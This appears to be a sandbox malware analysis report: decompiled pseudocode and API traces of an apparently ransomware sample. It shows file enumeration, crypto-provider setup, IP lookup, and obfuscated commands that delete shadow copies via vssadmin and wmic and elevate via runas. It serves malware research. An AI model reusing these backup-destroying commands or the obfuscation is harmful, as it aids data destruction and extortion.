CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 00405E4E

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00405D8A, 00405DB0, 00405E43

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
Instruction ID: a5e1c5bc4adb18f4c6cf36d0885f5ae2a65a9070c6c01f648420f3db759758e1
Opcode Fuzzy Hash: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
Instruction Fuzzy Hash: FD216A75790308BBEB20CBA0DE4AF9B7779AB88B01F104425F701BA1D0C6B99940DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004068F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0040690F
lstrlenW.KERNEL32(004103AC), ref: 0040691C

Part of subcall function 00407A00: InternetCloseHandle.WININET(?), ref: 00407A13
Part of subcall function 00407A00: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 0040694B
wsprintfW.USER32 ref: 00406963
VirtualFree.KERNEL32(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 00406979
InternetCloseHandle.WININET(?), ref: 00406987

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0040693C
GET, xrefs: 00406924

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
Instruction ID: 036ff581c335500f2984d10930e2f34b8e696fb6c4e233a2217fb5cd2a6ee9c0
Opcode Fuzzy Hash: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
Instruction Fuzzy Hash: 6201B13574020577EB206B729E4EF9F3A38AB85B11F140036FA05F61C1DEB89959C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004066F0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004066F0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E004064A0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E00406640(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if((_v616.dwFileAttributes & 0x00000010) == 0) {
										_v16 =  *_t54;
										_t46 = E004063B0(_t63,  &_v616, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E004066F0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

APIs

Part of subcall function 00406110: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
Part of subcall function 00406110: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C

Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
Part of subcall function 004064A0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,?), ref: 00406524
Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
Part of subcall function 004064A0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
Part of subcall function 004064A0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
Part of subcall function 004064A0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
Part of subcall function 004064A0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
Part of subcall function 004064A0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF

Part of subcall function 00406640: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
Part of subcall function 00406640: wsprintfW.USER32 ref: 00406663
Part of subcall function 00406640: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
Part of subcall function 00406640: GetLastError.KERNEL32(?,?), ref: 0040668C
Part of subcall function 00406640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
lstrcatW.KERNEL32(00000000,?), ref: 004067A8
lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
FindClose.KERNEL32(00003000,?,?), ref: 0040682E

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
String ID:
API String ID: 1112924665-0
Opcode ID: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
Instruction ID: e664c09a6a9c308cb7d1e0fe319252d12530e52bee12665a8dc8c6cfb3a3f5dc
Opcode Fuzzy Hash: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
Instruction Fuzzy Hash: 60318F71A00219ABDF10AF65DD84AAE77B8EF44314B0584B7F806F7291DB389E50CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402F50 Relevance: 10.6, APIs: 7, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00402F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				WCHAR* _t23;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8);
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
					_t35 = _t18;
					if(_t35 != 0) {
						_push( &_v12);
						_push(_v8);
						_push(_t35);
						if( *_t39() == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000);
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 <= 0) {
								goto L10;
							} else {
								while(1) {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400);
									if(_t23 != 0 && lstrcmpiW( &_v2064, _v16) == 0) {
										break;
									}
									_t40 = _t40 + 1;
									if(_t40 < _t31) {
										continue;
									} else {
										goto L10;
									}
									goto L12;
								}
								VirtualFree(_t35, 0, 0x8000);
								return 1;
							}
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

APIs

EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 00402F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID:
API String ID: 4140748134-0
Opcode ID: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
Instruction ID: ae1065d34e0a9f40daa088a41d748c469a9f576a3d92cbe81eb507f1f3ca9255
Opcode Fuzzy Hash: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
Instruction Fuzzy Hash: 9621A43260011AABEB109B989D89FAAB7BCEB44715F1001B6EE04E61D0D7B19D05AB94

Uniqueness

Uniqueness Score: -1.00%

Function 004077F0 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004077F0(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0);
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED

Strings

3, xrefs: 004079CD
, xrefs: 004078A1
, xrefs: 0040795D
(, xrefs: 00407851
7, xrefs: 00407909
e, xrefs: 00407972
c, xrefs: 0040794F
), xrefs: 004078BF
l, xrefs: 00407829
8, xrefs: 0040798E
t, xrefs: 004078FB
i, xrefs: 004079B8
i, xrefs: 0040793A
0, xrefs: 00407847
e, xrefs: 004078DD
a, xrefs: 004079AA
K, xrefs: 004078F1
e, xrefs: 00407941
d, xrefs: 00407865
, xrefs: 00407879
, xrefs: 00407933
6, xrefs: 004078B5
T, xrefs: 00407925
o, xrefs: 0040796B
O, xrefs: 004078AB
A, xrefs: 004078C9
w, xrefs: 0040786F
e, xrefs: 004078E7
h, xrefs: 00407964
., xrefs: 00407987
5, xrefs: 00407902
a, xrefs: 004079B1
K, xrefs: 0040791E
z, xrefs: 0040781F
L, xrefs: 0040792C
, xrefs: 004079A3
3, xrefs: 00407995
5, xrefs: 0040783D
., xrefs: 00407980
M, xrefs: 00407814
p, xrefs: 004078D3
7, xrefs: 004079C6
6, xrefs: 0040788D
5, xrefs: 00407979
o, xrefs: 00407956
, xrefs: 00407917
5, xrefs: 004079BF
G, xrefs: 00407948
3, xrefs: 00407910
a, xrefs: 00407833
1, xrefs: 00407897
8, xrefs: 0040799C
T, xrefs: 00407883
i, xrefs: 0040785B

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
Instruction ID: 8ec0cbb63084930b06e9c442bfdedbe0f88dfa63fe684bf69a99aafbe0ca1518
Opcode Fuzzy Hash: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
Instruction Fuzzy Hash: 0541A8B4811369DEEB21CF91999879EBFF5BB04748F50819ED5087B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00404330 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00404330(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E00403AE0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

APIs

Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 004044EF
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 00404505
lstrcatW.KERNEL32(00000000,0063005C), ref: 0040450D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 00404523
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404537

Strings

l, xrefs: 00404454
p, xrefs: 004043B3
\, xrefs: 0040434E
u, xrefs: 004044C2
t, xrefs: 0040445F
a, xrefs: 00404431
open, xrefs: 0040451C
i, xrefs: 00404376
., xrefs: 00404400
n, xrefs: 00404441
s, xrefs: 00404393
, xrefs: 004043BB
/, xrefs: 004044B7
h, xrefs: 00404475
w, xrefs: 0040448B
e, xrefs: 004043CB
d, xrefs: 00404449
l, xrefs: 004044AC
a, xrefs: 004044A1
., xrefs: 0040437E
e, xrefs: 004043D3
/, xrefs: 00404419
s, xrefs: 00404429
, xrefs: 0040446A
b, xrefs: 00404356
c, xrefs: 004043AB
, xrefs: 00404496
x, xrefs: 00404386
a, xrefs: 0040439B
x, xrefs: 0040440C
e, xrefs: 004043C3
, xrefs: 00404421
m, xrefs: 00404439
d, xrefs: 00404480
e, xrefs: 004044CD
m, xrefs: 00404362
\, xrefs: 004043E2
m, xrefs: 004043EC
o, xrefs: 004043A3
w, xrefs: 0040436E

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
Instruction ID: b655391ad336c4b4d1e3433ef327ff3d08d390bc764b3395417c8c24b6d0b817
Opcode Fuzzy Hash: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
Instruction Fuzzy Hash: 7D41FAB0248380DFE3208F119949B5BBEE6BBC5B49F10491DE6985A291C7F6854CCF9B

Uniqueness

Uniqueness Score: -1.00%

Function 00403BA0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403BA0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E00403AE0(__edx);
				if(_t54 != 0) {
					_t54 = E00403A60();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
